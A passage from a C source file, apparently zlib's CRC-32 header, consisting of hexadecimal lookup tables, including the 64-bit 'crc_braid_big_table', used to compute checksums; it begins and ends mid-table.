0x989aec3c, 0x708d7c9d, 0x93c4cb3f, 0x7bd35b9e, 0x8e26a23a, 0x6631329b, 0x85788539, 0x6d6f1598, 0xef134828, 0x0704d889, 0xe44d6f2b, 0x0c5aff8a, 0xf9af062e, 0x11b8968f, 0xf2f1212d, 0x1ae6b18c, 0xc26bd424, 0x2a7c4485, 0xc935f327, 0x21226386, 0xd4d79a22, 0x3cc00a83, 0xdf89bd21, 0x379e2d80, 0xb0b5e621, 0x58a27680, 0xbbebc122, 0x53fc5183, 0xa609a827, 0x4e1e3886, 0xad578f24, 0x45401f85, 0x9dcd7a2d, 0x75daea8c, 0x96935d2e, 0x7e84cd8f, 0x8b71342b, 0x6366a48a, 0x802f1328, 0x68388389, 0xea44de39, 0x02534e98, 0xe11af93a, 0x090d699b, 0xfcf8903f, 0x14ef009e, 0xf7a6b73c, 0x1fb1279d, 0xc73c4235, 0x2f2bd294, 0xcc626536, 0x2475f597, 0xd1800c33, 0x39979c92, 0xdade2b30, 0x32c9bb91, 0x05579611, 0xed4006b0, 0x0e09b112, 0xe61e21b3, 0x13ebd817, 0xfbfc48b6, 0x18b5ff14, 0xf0a26fb5, 0x282f0a1d, 0xc0389abc, 0x23712d1e, 0xcb66bdbf, 0x3e93441b, 0xd684d4ba, 0x35cd6318, 0xdddaf3b9, 0x5fa6ae09, 0xb7b13ea8, 0x54f8890a, 0xbcef19ab, 0x491ae00f, 0xa10d70ae, 0x4244c70c, 0xaa5357ad, 0x72de3205, 0x9ac9a2a4, 0x79801506, 0x919785a7, 0x64627c03, 0x8c75eca2, 0x6f3c5b00, 0x872bcba1, 0xba1aca03, 0x520d5aa2, 0xb144ed00, 0x59537da1, 0xaca68405, 0x44b114a4, 0xa7f8a306, 0x4fef33a7, 0x9762560f, 0x7f75c6ae, 0x9c3c710c, 0x742be1ad, 0x81de1809, 0x69c988a8, 0x8a803f0a, 0x6297afab, 0xe0ebf21b, 0x08fc62ba, 0xebb5d518, 0x03a245b9, 0xf657bc1d, 0x1e402cbc, 0xfd099b1e, 0x151e0bbf, 0xcd936e17, 0x2584feb6, 0xc6cd4914, 0x2edad9b5, 0xdb2f2011, 0x3338b0b0, 0xd0710712, 0x386697b3, 0x0ff8ba33, 0xe7ef2a92, 0x04a69d30, 0xecb10d91, 0x1944f435, 0xf1536494, 0x121ad336, 0xfa0d4397, 0x2280263f, 0xca97b69e, 0x29de013c, 0xc1c9919d, 0x343c6839, 0xdc2bf898, 0x3f624f3a, 0xd775df9b, 0x5509822b, 0xbd1e128a, 0x5e57a528, 0xb6403589, 0x43b5cc2d, 0xaba25c8c, 0x48ebeb2e, 0xa0fc7b8f, 0x78711e27, 0x90668e86, 0x732f3924, 0x9b38a985, 0x6ecd5021, 0x86dac080, 0x65937722, 0x8d84e783, 0x0aaf2c22, 0xe2b8bc83, 0x01f10b21, 0xe9e69b80, 0x1c136224, 0xf404f285, 0x174d4527, 0xff5ad586, 0x27d7b02e, 0xcfc0208f, 0x2c89972d, 0xc49e078c, 0x316bfe28, 0xd97c6e89, 0x3a35d92b, 0xd222498a, 0x505e143a, 0xb849849b, 0x5b003339, 0xb317a398, 0x46e25a3c, 0xaef5ca9d, 0x4dbc7d3f, 0xa5abed9e, 0x7d268836, 0x95311897, 0x7678af35, 0x9e6f3f94, 0x6b9ac630, 0x838d5691, 0x60c4e133, 0x88d37192, 0xbf4d5c12, 0x575accb3, 0xb4137b11, 0x5c04ebb0, 0xa9f11214, 0x41e682b5, 0xa2af3517, 0x4ab8a5b6, 0x9235c01e, 0x7a2250bf, 0x996be71d, 0x717c77bc, 0x84898e18, 0x6c9e1eb9, 0x8fd7a91b, 0x67c039ba, 0xe5bc640a, 0x0dabf4ab, 0xeee24309, 0x06f5d3a8, 0xf3002a0c, 0x1b17baad, 0xf85e0d0f, 0x10499dae, 0xc8c4f806, 0x20d368a7, 0xc39adf05, 0x2b8d4fa4, 0xde78b600, 0x366f26a1, 0xd5269103, 0x3d3101a2}}; local const z_word_t FAR crc_braid_big_table[][256] = { {0x0000000000000000, 0xa19017e800000000, 0x03275e0b00000000, 0xa2b749e300000000, 0x064ebc1600000000, 0xa7deabfe00000000, 0x0569e21d00000000, 0xa4f9f5f500000000, 0x0c9c782d00000000, 0xad0c6fc500000000, 0x0fbb262600000000, 0xae2b31ce00000000, 0x0ad2c43b00000000, 0xab42d3d300000000, 0x09f59a3000000000, 0xa8658dd800000000, 0x1838f15a00000000, 0xb9a8e6b200000000, 0x1b1faf5100000000, 0xba8fb8b900000000, 0x1e764d4c00000000, 0xbfe65aa400000000, 0x1d51134700000000, 0xbcc104af00000000, 0x14a4897700000000, 0xb5349e9f00000000, 0x1783d77c00000000, 0xb613c09400000000, 0x12ea356100000000, 0xb37a228900000000, 0x11cd6b6a00000000, 0xb05d7c8200000000, 0x3070e2b500000000, 0x91e0f55d00000000, 0x3357bcbe00000000, 0x92c7ab5600000000, 0x363e5ea300000000, 0x97ae494b00000000, 0x351900a800000000, 0x9489174000000000, 0x3cec9a9800000000, 0x9d7c8d7000000000, 0x3fcbc49300000000, 0x9e5bd37b00000000, 0x3aa2268e00000000, 0x9b32316600000000, 0x3985788500000000, 0x98156f6d00000000, 0x284813ef00000000, 0x89d8040700000000, 0x2b6f4de400000000, 0x8aff5a0c00000000, 0x2e06aff900000000, 0x8f96b81100000000, 0x2d21f1f200000000, 0x8cb1e61a00000000, 0x24d46bc200000000, 0x85447c2a00000000, 0x27f335c900000000, 0x8663222100000000, 0x229ad7d400000000, 0x830ac03c00000000, 0x21bd89df00000000, 0x802d9e3700000000, 0x21e6b5b000000000, 0x8076a25800000000, 0x22c1ebbb00000000, 0x8351fc5300000000, 0x27a809a600000000, 0x86381e4e00000000, 0x248f57ad00000000, 0x851f404500000000, 0x2d7acd9d00000000, 0x8ceada7500000000, 0x2e5d939600000000, 0x8fcd847e00000000, 0x2b34718b00000000, 0x8aa4666300000000, 0x28132f8000000000, 0x8983386800000000, 0x39de44ea00000000, 0x984e530200000000, 0x3af91ae100000000, 0x9b690d0900000000, 0x3f90f8fc00000000, 0x9e00ef1400000000, 0x3cb7a6f700000000, 0x9d27b11f00000000, 0x35423cc700000000, 0x94d22b2f00000000, 0x366562cc00000000, 0x97f5752400000000, 0x330c80d100000000, 0x929c973900000000, 0x302bdeda00000000, 0x91bbc93200000000, 0x1196570500000000, 0xb00640ed00000000, 0x12b1090e00000000, 0xb3211ee600000000, 0x17d8eb1300000000, 0xb648fcfb00000000, 0x14ffb51800000000, 0xb56fa2f000000000, 0x1d0a2f2800000000, 0xbc9a38c000000000, 0x1e2d712300000000, 0xbfbd66cb00000000, 0x1b44933e00000000, 0xbad484d600000000, 0x1863cd3500000000, 0xb9f3dadd00000000, 0x09aea65f00000000, 0xa83eb1b700000000, 0x0a89f85400000000, 0xab19efbc00000000, 0x0fe01a4900000000, 0xae700da100000000, 0x0cc7444200000000, 0xad5753aa00000000, 0x0532de7200000000, 0xa4a2c99a00000000, 0x0615807900000000, 0xa785979100000000, 0x037c626400000000, 0xa2ec758c00000000, 0x005b3c6f00000000, 0xa1cb2b8700000000, 0x03ca1aba00000000, 0xa25a0d5200000000, 0x00ed44b100000000, 0xa17d535900000000, 0x0584a6ac00000000, 0xa414b14400000000, 0x06a3f8a700000000, 0xa733ef4f00000000, 0x0f56629700000000, 0xaec6757f00000000, 0x0c713c9c00000000, 0xade12b7400000000, 0x0918de8100000000, 0xa888c96900000000, 0x0a3f808a00000000, 0xabaf976200000000, 0x1bf2ebe000000000, 0xba62fc0800000000, 0x18d5b5eb00000000, 0xb945a20300000000, 0x1dbc57f600000000, 0xbc2c401e00000000, 0x1e9b09fd00000000, 0xbf0b1e1500000000, 0x176e93cd00000000, 0xb6fe842500000000, 0x1449cdc600000000, 0xb5d9da2e00000000, 0x11202fdb00000000, 0xb0b0383300000000, 0x120771d000000000, 0xb397663800000000, 0x33baf80f00000000, 0x922aefe700000000, 0x309da60400000000, 0x910db1ec00000000, 0x35f4441900000000, 0x946453f100000000, 0x36d31a1200000000, 0x97430dfa00000000, 0x3f26802200000000, 0x9eb697ca00000000, 0x3c01de2900000000, 0x9d91c9c100000000, 0x39683c3400000000, 0x98f82bdc00000000, 0x3a4f623f00000000, 0x9bdf75d700000000, 0x2b82095500000000, 0x8a121ebd00000000, 0x28a5575e00000000, 0x893540b600000000, 0x2dccb54300000000, 0x8c5ca2ab00000000, 0x2eebeb4800000000, 0x8f7bfca000000000, 0x271e717800000000, 0x868e669000000000, 0x24392f7300000000, 0x85a9389b00000000, 0x2150cd6e00000000, 0x80c0da8600000000, 0x2277936500000000, 0x83e7848d00000000, 0x222caf0a00000000, 0x83bcb8e200000000, 0x210bf10100000000, 0x809be6e900000000, 0x2462131c00000000, 0x85f204f400000000, 0x27454d1700000000, 0x86d55aff00000000, 0x2eb0d72700000000, 0x8f20c0cf00000000, 0x2d97892c00000000, 0x8c079ec400000000, 0x28fe6b3100000000, 0x896e7cd900000000, 0x2bd9353a00000000, 0x8a4922d200000000, 0x3a145e5000000000, 0x9b8449b800000000, 0x3933005b00000000, 0x98a317b300000000, 0x3c5ae24600000000, 0x9dcaf5ae00000000, 0x3f7dbc4d00000000, 0x9eedaba500000000, 0x3688267d00000000, 0x9718319500000000, 0x35af787600000000, 0x943f6f9e00000000, 0x30c69a6b00000000, 0x91568d8300000000, 0x33e1c46000000000, 0x9271d38800000000, 0x125c4dbf00000000, 0xb3cc5a5700000000, 0x117b13b400000000, 0xb0eb045c00000000, 0x1412f1a900000000, 0xb582e64100000000, 0x1735afa200000000, 0xb6a5b84a00000000, 0x1ec0359200000000, 0xbf50227a00000000, 0x1de76b9900000000, 0xbc777c7100000000, 0x188e898400000000, 0xb91e9e6c00000000, 0x1ba9d78f00000000, 0xba39c06700000000, 0x0a64bce500000000, 0xabf4ab0d00000000, 0x0943e2ee00000000, 0xa8d3f50600000000, 0x0c2a00f300000000, 0xadba171b00000000, 0x0f0d5ef800000000, 0xae9d491000000000, 0x06f8c4c800000000, 0xa768d32000000000, 0x05df9ac300000000, 0xa44f8d2b00000000, 0x00b678de00000000, 0xa1266f3600000000, 0x039126d500000000, 0xa201313d00000000}, {0x0000000000000000, 0xee8439a100000000, 0x9d0f029900000000, 0x738b3b3800000000, 0x7b1975e900000000, 0x959d4c4800000000, 0xe616777000000000, 0x08924ed100000000, 0xb7349b0900000000, 0x59b0a2a800000000, 0x2a3b999000000000, 0xc4bfa03100000000, 0xcc2deee000000000, 0x22a9d74100000000, 0x5122ec7900000000, 0xbfa6d5d800000000, 0x6e69361300000000, 0x80ed0fb200000000, 0xf366348a00000000, 0x1de20d2b00000000, 0x157043fa00000000, 0xfbf47a5b00000000, 0x887f416300000000, 0x66fb78c200000000, 0xd95dad1a00000000, 0x37d994bb00000000, 0x4452af8300000000, 0xaad6962200000000, 0xa244d8f300000000, 0x4cc0e15200000000, 0x3f4bda6a00000000, 0xd1cfe3cb00000000, 0xdcd26c2600000000, 0x3256558700000000, 0x41dd6ebf00000000, 0xaf59571e00000000, 0xa7cb19cf00000000, 0x494f206e00000000, 0x3ac41b5600000000, 0xd44022f700000000, 0x6be6f72f00000000, 0x8562ce8e00000000, 0xf6e9f5b600000000, 0x186dcc1700000000, 0x10ff82c600000000, 0xfe7bbb6700000000, 0x8df0805f00000000, 0x6374b9fe00000000, 0xb2bb5a3500000000, 0x5c3f639400000000, 0x2fb458ac00000000, 0xc130610d00000000, 0xc9a22fdc00000000, 0x2726167d00000000, 0x54ad2d4500000000, 0xba2914e400000000, 0x058fc13c00000000, 0xeb0bf89d00000000, 0x9880c3a500000000, 0x7604fa0400000000, 0x7e96b4d500000000, 0x90128d7400000000, 0xe399b64c00000000, 0x0d1d8fed00000000, 0xb8a5d94c00000000, 0x5621e0ed00000000, 0x25aadbd500000000, 0xcb2ee27400000000, 0xc3bcaca500000000, 0x2d38950400000000, 0x5eb3ae3c00000000, 0xb037979d00000000, 0x0f91424500000000, 0xe1157be400000000, 0x929e40dc00000000, 0x7c1a797d00000000, 0x748837ac00000000, 0x9a0c0e0d00000000, 0xe987353500000000, 0x07030c9400000000, 0xd6ccef5f00000000, 0x3848d6fe00000000, 0x4bc3edc600000000, 0xa547d46700000000, 0xadd59ab600000000, 0x4351a31700000000, 0x30da982f00000000, 0xde5ea18e00000000, 0x61f8745600000000, 0x8f7c4df700000000, 0xfcf776cf00000000, 0x12734f6e00000000, 0x1ae101bf00000000, 0xf465381e00000000, 0x87ee032600000000, 0x696a3a8700000000, 0x6477b56a00000000, 0x8af38ccb00000000, 0xf978b7f300000000, 0x17fc8e5200000000, 0x1f6ec08300000000, 0xf1eaf92200000000, 0x8261c21a00000000, 0x6ce5fbbb00000000, 0xd3432e6300000000, 0x3dc717c200000000, 0x4e4c2cfa00000000, 0xa0c8155b00000000, 0xa85a5b8a00000000, 0x46de622b00000000, 0x3555591300000000, 0xdbd160b200000000, 0x0a1e837900000000, 0xe49abad800000000, 0x971181e000000000, 0x7995b84100000000, 0x7107f69000000000, 0x9f83cf3100000000, 0xec08f40900000000, 0x028ccda800000000, 0xbd2a187000000000, 0x53ae21d100000000, 0x20251ae900000000, 0xcea1234800000000, 0xc6336d9900000000, 0x28b7543800000000, 0x5b3c6f0000000000, 0xb5b856a100000000, 0x704bb39900000000, 0x9ecf8a3800000000, 0xed44b10000000000, 0x03c088a100000000, 0x0b52c67000000000, 0xe5d6ffd100000000, 0x965dc4e900000000, 0x78d9fd4800000000, 0xc77f289000000000, 0x29fb113100000000, 0x5a702a0900000000, 0xb4f413a800000000, 0xbc665d7900000000, 0x52e264d800000000, 0x21695fe000000000, 0xcfed664100000000, 0x1e22858a00000000, 0xf0a6bc2b00000000, 0x832d871300000000, 0x6da9beb200000000, 0x653bf06300000000, 0x8bbfc9c200000000, 0xf834f2fa00000000, 0x16b0cb5b00000000, 0xa9161e8300000000, 0x4792272200000000, 0x34191c1a00000000, 0xda9d25bb00000000, 0xd20f6b6a00000000, 0x3c8b52cb00000000, 0x4f0069f300000000, 0xa184505200000000, 0xac99dfbf00000000, 0x421de61e00000000, 0x3196dd2600000000, 0xdf12e48700000000, 0xd780aa5600000000, 0x390493f700000000, 0x4a8fa8cf00000000, 0xa40b916e00000000, 0x1bad44b600000000, 0xf5297d1700000000, 0x86a2462f00000000, 0x68267f8e00000000, 0x60b4315f00000000, 0x8e3008fe00000000, 0xfdbb33c600000000, 0x133f0a6700000000, 0xc2f0e9ac00000000, 0x2c74d00d00000000, 0x5fffeb3500000000, 0xb17bd29400000000, 0xb9e99c4500000000, 0x576da5e400000000, 0x24e69edc00000000, 0xca62a77d00000000, 0x75c472a500000000, 0x9b404b0400000000, 0xe8cb703c00000000, 0x064f499d00000000, 0x0edd074c00000000, 0xe0593eed00000000, 0x93d205d500000000, 0x7d563c7400000000, 0xc8ee6ad500000000, 0x266a537400000000, 0x55e1684c00000000, 0xbb6551ed00000000, 0xb3f71f3c00000000, 0x5d73269d00000000, 0x2ef81da500000000, 0xc07c240400000000, 0x7fdaf1dc00000000, 0x915ec87d00000000, 0xe2d5f34500000000, 0x0c51cae400000000, 0x04c3843500000000, 0xea47bd9400000000, 0x99cc86ac00000000, 0x7748bf0d00000000, 0xa6875cc600000000, 0x4803656700000000, 0x3b885e5f00000000, 0xd50c67fe00000000, 0xdd9e292f00000000, 0x331a108e00000000, 0x40912bb600000000, 0xae15121700000000, 0x11b3c7cf00000000, 0xff37fe6e00000000, 0x8cbcc55600000000, 0x6238fcf700000000, 0x6aaab22600000000, 0x842e8b8700000000, 0xf7a5b0bf00000000, 0x1921891e00000000, 0x143c06f300000000, 0xfab83f5200000000, 0x8933046a00000000, 0x67b73dcb00000000, 0x6f25731a00000000, 0x81a14abb00000000, 0xf22a718300000000, 0x1cae482200000000, 0xa3089dfa00000000, 0x4d8ca45b00000000, 0x3e079f6300000000, 0xd083a6c200000000, 0xd811e81300000000, 0x3695d1b200000000, 0x451eea8a00000000, 0xab9ad32b00000000, 0x7a5530e000000000, 0x94d1094100000000, 0xe75a327900000000, 0x09de0bd800000000, 0x014c450900000000, 0xefc87ca800000000, 0x9c43479000000000, 0x72c77e3100000000, 0xcd61abe900000000, 0x23e5924800000000, 0x506ea97000000000, 0xbeea90d100000000, 0xb678de0000000000, 0x58fce7a100000000, 0x2b77dc9900000000, 0xc5f3e53800000000}, {0x0000000000000000, 0xfbf6134700000000, 0xf6ed278e00000000, 0x0d1b34c900000000, 0xaddd3ec700000000, 0x562b2d8000000000, 0x5b30194900000000, 0xa0c60a0e00000000, 0x1bbd0c5500000000, 0xe04b1f1200000000, 0xed502bdb00000000, 0x16a6389c00000000, 0xb660329200000000, 0x4d9621d500000000, 0x408d151c00000000, 0xbb7b065b00000000, 0x367a19aa00000000, 0xcd8c0aed00000000, 0xc0973e2400000000, 0x3b612d6300000000, 0x9ba7276d00000000, 0x6051342a00000000, 0x6d4a00e300000000, 0x96bc13a400000000, 0x2dc715ff00000000, 0xd63106b800000000, 0xdb2a327100000000, 0x20dc213600000000, 0x801a2b3800000000, 0x7bec387f00000000, 0x76f70cb600000000, 0x8d011ff100000000, 0x2df2438f00000000, 0xd60450c800000000, 0xdb1f640100000000, 0x20e9774600000000, 0x802f7d4800000000, 0x7bd96e0f00000000, 0x76c25ac600000000, 0x8d34498100000000, 0x364f4fda00000000, 0xcdb95c9d00000000, 0xc0a2685400000000, 0x3b547b1300000000, 0x9b92711d00000000, 0x6064625a00000000, 0x6d7f569300000000, 0x968945d400000000, 0x1b885a2500000000, 0xe07e496200000000, 0xed657dab00000000, 0x16936eec00000000, 0xb65564e200000000, 0x4da377a500000000, 0x40b8436c00000000, 0xbb4e502b00000000, 0x0035567000000000, 0xfbc3453700000000, 0xf6d871fe00000000, 0x0d2e62b900000000, 0xade868b700000000, 0x561e7bf000000000, 0x5b054f3900000000, 0xa0f35c7e00000000, 0x1be2f6c500000000, 0xe014e58200000000, 0xed0fd14b00000000, 0x16f9c20c00000000, 0xb63fc80200000000, 0x4dc9db4500000000, 0x40d2ef8c00000000, 0xbb24fccb00000000, 0x005ffa9000000000, 0xfba9e9d700000000, 0xf6b2dd1e00000000, 0x0d44ce5900000000, 0xad82c45700000000, 0x5674d71000000000, 0x5b6fe3d900000000, 0xa099f09e00000000, 0x2d98ef6f00000000, 0xd66efc2800000000, 0xdb75c8e100000000, 0x2083dba600000000, 0x8045d1a800000000, 0x7bb3c2ef00000000, 0x76a8f62600000000, 0x8d5ee56100000000, 0x3625e33a00000000, 0xcdd3f07d00000000, 0xc0c8c4b400000000, 0x3b3ed7f300000000, 0x9bf8ddfd00000000, 0x600eceba00000000, 0x6d15fa7300000000, 0x96e3e93400000000, 0x3610b54a00000000, 0xcde6a60d00000000, 0xc0fd92c400000000, 0x3b0b818300000000, 0x9bcd8b8d00000000, 0x603b98ca00000000, 0x6d20ac0300000000, 0x96d6bf4400000000, 0x2dadb91f00000000, 0xd65baa5800000000, 0xdb409e9100000000, 0x20b68dd600000000, 0x807087d800000000, 0x7b86949f00000000, 0x769da05600000000, 0x8d6bb31100000000, 0x006aace000000000, 0xfb9cbfa700000000, 0xf6878b6e00000000, 0x0d71982900000000, 0xadb7922700000000, 0x5641816000000000, 0x5b5ab5a900000000, 0xa0aca6ee00000000, 0x1bd7a0b500000000, 0xe021b3f200000000, 0xed3a873b00000000, 0x16cc947c00000000, 0xb60a9e7200000000, 0x4dfc8d3500000000, 0x40e7b9fc00000000, 0xbb11aabb00000000, 0x77c29c5000000000, 0x8c348f1700000000, 0x812fbbde00000000, 0x7ad9a89900000000, 0xda1fa29700000000, 0x21e9b1d000000000, 0x2cf2851900000000, 0xd704965e00000000, 0x6c7f900500000000, 0x9789834200000000, 0x9a92b78b00000000, 0x6164a4cc00000000, 0xc1a2aec200000000, 0x3a54bd8500000000, 0x374f894c00000000, 0xccb99a0b00000000, 0x41b885fa00000000, 0xba4e96bd00000000, 0xb755a27400000000, 0x4ca3b13300000000, 0xec65bb3d00000000, 0x1793a87a00000000, 0x1a889cb300000000, 0xe17e8ff400000000, 0x5a0589af00000000, 0xa1f39ae800000000, 0xace8ae2100000000, 0x571ebd6600000000, 0xf7d8b76800000000, 0x0c2ea42f00000000, 0x013590e600000000, 0xfac383a100000000, 0x5a30dfdf00000000, 0xa1c6cc9800000000, 0xacddf85100000000, 0x572beb1600000000, 0xf7ede11800000000, 0x0c1bf25f00000000, 0x0100c69600000000, 0xfaf6d5d100000000, 0x418dd38a00000000, 0xba7bc0cd00000000, 0xb760f40400000000, 0x4c96e74300000000, 0xec50ed4d00000000, 0x17a6fe0a00000000, 0x1abdcac300000000, 0xe14bd98400000000, 0x6c4ac67500000000, 0x97bcd53200000000, 0x9aa7e1fb00000000, 0x6151f2bc00000000, 0xc197f8b200000000, 0x3a61ebf500000000, 0x377adf3c00000000, 0xcc8ccc7b00000000, 0x77f7ca2000000000, 0x8c01d96700000000, 0x811aedae00000000, 0x7aecfee900000000, 0xda2af4e700000000, 0x21dce7a000000000, 0x2cc7d36900000000, 0xd731c02e00000000, 0x6c206a9500000000, 0x97d679d200000000, 0x9acd4d1b00000000, 0x613b5e5c00000000, 0xc1fd545200000000, 0x3a0b471500000000, 0x371073dc00000000, 0xcce6609b00000000, 0x779d66c000000000, 0x8c6b758700000000, 0x8170414e00000000, 0x7a86520900000000, 0xda40580700000000, 0x21b64b4000000000, 0x2cad7f8900000000, 0xd75b6cce00000000, 0x5a5a733f00000000, 0xa1ac607800000000, 0xacb754b100000000, 0x574147f600000000, 0xf7874df800000000, 0x0c715ebf00000000, 0x016a6a7600000000, 0xfa9c793100000000, 0x41e77f6a00000000, 0xba116c2d00000000, 0xb70a58e400000000, 0x4cfc4ba300000000, 0xec3a41ad00000000, 0x17cc52ea00000000, 0x1ad7662300000000, 0xe121756400000000, 0x41d2291a00000000, 0xba243a5d00000000, 0xb73f0e9400000000, 0x4cc91dd300000000, 0xec0f17dd00000000, 0x17f9049a00000000, 0x1ae2305300000000, 0xe114231400000000, 0x5a6f254f00000000, 0xa199360800000000, 0xac8202c100000000, 0x5774118600000000, 0xf7b21b8800000000, 0x0c4408cf00000000, 0x015f3c0600000000, 0xfaa92f4100000000, 0x77a830b000000000, 0x8c5e23f700000000, 0x8145173e00000000, 0x7ab3047900000000, 0xda750e7700000000, 0x21831d3000000000, 0x2c9829f900000000, 0xd76e3abe00000000, 0x6c153ce500000000, 0x97e32fa200000000, 0x9af81b6b00000000, 0x610e082c00000000, 0xc1c8022200000000, 0x3a3e116500000000, 0x372525ac00000000, 0xccd336eb00000000}, {0x0000000000000000, 0x6238282a00000000, 0xc470505400000000, 0xa648787e00000000, 0x88e1a0a800000000, 0xead9888200000000, 0x4c91f0fc00000000, 0x2ea9d8d600000000, 0x51c5308a00000000, 0x33fd18a000000000, 0x95b560de00000000, 0xf78d48f400000000, 0xd924902200000000, 0xbb1cb80800000000, 0x1d54c07600000000, 0x7f6ce85c00000000, 0xe38c10cf00000000, 0x81b438e500000000, 0x27fc409b00000000, 0x45c468b100000000, 0x6b6db06700000000, 0x0955984d00000000, 0xaf1de03300000000, 0xcd25c81900000000, 0xb249204500000000, 0xd071086f00000000, 0x7639701100000000, 0x1401583b00000000, 0x3aa880ed00000000, 0x5890a8c700000000, 0xfed8d0b900000000, 0x9ce0f89300000000, 0x871f504500000000, 0xe527786f00000000, 0x436f001100000000, 0x2157283b00000000, 0x0ffef0ed00000000, 0x6dc6d8c700000000, 0xcb8ea0b900000000, 0xa9b6889300000000, 0xd6da60cf00000000, 0xb4e248e500000000, 0x12aa309b00000000, 0x709218b100000000, 0x5e3bc06700000000, 0x3c03e84d00000000, 0x9a4b903300000000, 0xf873b81900000000, 0x6493408a00000000, 0x06ab68a000000000, 0xa0e310de00000000, 0xc2db38f400000000, 0xec72e02200000000, 0x8e4ac80800000000, 0x2802b07600000000, 0x4a3a985c00000000, 0x3556700000000000, 0x576e582a00000000, 0xf126205400000000, 0x931e087e00000000, 0xbdb7d0a800000000, 0xdf8ff88200000000, 0x79c780fc00000000, 0x1bffa8d600000000, 0x0e3fa08a00000000, 0x6c0788a000000000, 0xca4ff0de00000000, 0xa877d8f400000000, 0x86de002200000000, 0xe4e6280800000000, 0x42ae507600000000, 0x2096785c00000000, 0x5ffa900000000000, 0x3dc2b82a00000000, 0x9b8ac05400000000, 0xf9b2e87e00000000, 0xd71b30a800000000, 0xb523188200000000, 0x136b60fc00000000, 0x715348d600000000, 0xedb3b04500000000, 0x8f8b986f00000000, 0x29c3e01100000000, 0x4bfbc83b00000000, 0x655210ed00000000, 0x076a38c700000000, 0xa12240b900000000, 0xc31a689300000000, 0xbc7680cf00000000, 0xde4ea8e500000000, 0x7806d09b00000000, 0x1a3ef8b100000000, 0x3497206700000000, 0x56af084d00000000, 0xf0e7703300000000, 0x92df581900000000, 0x8920f0cf00000000, 0xeb18d8e500000000, 0x4d50a09b00000000, 0x2f6888b100000000, 0x01c1506700000000, 0x63f9784d00000000, 0xc5b1003300000000, 0xa789281900000000, 0xd8e5c04500000000, 0xbadde86f00000000, 0x1c95901100000000, 0x7eadb83b00000000, 0x500460ed00000000, 0x323c48c700000000, 0x947430b900000000, 0xf64c189300000000, 0x6aace00000000000, 0x0894c82a00000000, 0xaedcb05400000000, 0xcce4987e00000000, 0xe24d40a800000000, 0x8075688200000000, 0x263d10fc00000000, 0x440538d600000000, 0x3b69d08a00000000, 0x5951f8a000000000, 0xff1980de00000000, 0x9d21a8f400000000, 0xb388702200000000, 0xd1b0580800000000, 0x77f8207600000000, 0x15c0085c00000000, 0x5d7831ce00000000, 0x3f4019e400000000, 0x9908619a00000000, 0xfb3049b000000000, 0xd599916600000000, 0xb7a1b94c00000000, 0x11e9c13200000000, 0x73d1e91800000000, 0x0cbd014400000000, 0x6e85296e00000000, 0xc8cd511000000000, 0xaaf5793a00000000, 0x845ca1ec00000000, 0xe66489c600000000, 0x402cf1b800000000, 0x2214d99200000000, 0xbef4210100000000, 0xdccc092b00000000, 0x7a84715500000000, 0x18bc597f00000000, 0x361581a900000000, 0x542da98300000000, 0xf265d1fd00000000, 0x905df9d700000000, 0xef31118b00000000, 0x8d0939a100000000, 0x2b4141df00000000, 0x497969f500000000, 0x67d0b12300000000, 0x05e8990900000000, 0xa3a0e17700000000, 0xc198c95d00000000, 0xda67618b00000000, 0xb85f49a100000000, 0x1e1731df00000000, 0x7c2f19f500000000, 0x5286c12300000000, 0x30bee90900000000, 0x96f6917700000000, 0xf4ceb95d00000000, 0x8ba2510100000000, 0xe99a792b00000000, 0x4fd2015500000000, 0x2dea297f00000000, 0x0343f1a900000000, 0x617bd98300000000, 0xc733a1fd00000000, 0xa50b89d700000000, 0x39eb714400000000, 0x5bd3596e00000000, 0xfd9b211000000000, 0x9fa3093a00000000, 0xb10ad1ec00000000, 0xd332f9c600000000, 0x757a81b800000000, 0x1742a99200000000, 0x682e41ce00000000, 0x0a1669e400000000, 0xac5e119a00000000, 0xce6639b000000000, 0xe0cfe16600000000, 0x82f7c94c00000000, 0x24bfb13200000000, 0x4687991800000000, 0x5347914400000000, 0x317fb96e00000000, 0x9737c11000000000, 0xf50fe93a00000000, 0xdba631ec00000000, 0xb99e19c600000000, 0x1fd661b800000000, 0x7dee499200000000, 0x0282a1ce00000000, 0x60ba89e400000000, 0xc6f2f19a00000000, 0xa4cad9b000000000, 0x8a63016600000000, 0xe85b294c00000000, 0x4e13513200000000, 0x2c2b791800000000, 0xb0cb818b00000000, 0xd2f3a9a100000000, 0x74bbd1df00000000, 0x1683f9f500000000, 0x382a212300000000, 0x5a12090900000000, 0xfc5a717700000000, 0x9e62595d00000000, 0xe10eb10100000000, 0x8336992b00000000, 0x257ee15500000000, 0x4746c97f00000000, 0x69ef11a900000000, 0x0bd7398300000000, 0xad9f41fd00000000, 0xcfa769d700000000, 0xd458c10100000000, 0xb660e92b00000000, 0x1028915500000000, 0x7210b97f00000000, 0x5cb961a900000000, 0x3e81498300000000, 0x98c931fd00000000, 0xfaf119d700000000, 0x859df18b00000000, 0xe7a5d9a100000000, 0x41eda1df00000000, 0x23d589f500000000, 0x0d7c512300000000, 0x6f44790900000000, 0xc90c017700000000, 0xab34295d00000000, 0x37d4d1ce00000000, 0x55ecf9e400000000, 0xf3a4819a00000000, 0x919ca9b000000000, 0xbf35716600000000, 0xdd0d594c00000000, 0x7b45213200000000, 0x197d091800000000, 0x6611e14400000000, 0x0429c96e00000000, 0xa261b11000000000, 0xc059993a00000000, 0xeef041ec00000000, 0x8cc869c600000000, 0x2a8011b800000000, 0x48b8399200000000}, {0x0000000000000000, 0x4c2896a300000000, 0xd9565d9c00000000, 0x957ecb3f00000000, 0xf3abcbe300000000, 0xbf835d4000000000, 0x2afd967f00000000, 0x66d500dc00000000, 0xa751e61c00000000, 0xeb7970bf00000000, 0x7e07bb8000000000, 0x322f2d2300000000, 0x54fa2dff00000000, 0x18d2bb5c00000000, 0x8dac706300000000, 0xc184e6c000000000, 0x4ea3cc3900000000, 0x028b5a9a00000000, 0x97f591a500000000, 0xdbdd070600000000, 0xbd0807da00000000, 0xf120917900000000, 0x645e5a4600000000, 0x2876cce500000000, 0xe9f22a2500000000, 0xa5dabc8600000000, 0x30a477b900000000, 0x7c8ce11a00000000, 0x1a59e1c600000000, 0x5671776500000000, 0xc30fbc5a00000000, 0x8f272af900000000, 0x9c46997300000000, 0xd06e0fd000000000, 0x4510c4ef00000000, 0x0938524c00000000, 0x6fed529000000000, 0x23c5c43300000000, 0xb6bb0f0c00000000, 0xfa9399af00000000, 0x3b177f6f00000000, 0x773fe9cc00000000, 0xe24122f300000000, 0xae69b45000000000, 0xc8bcb48c00000000, 0x8494222f00000000, 0x11eae91000000000, 0x5dc27fb300000000, 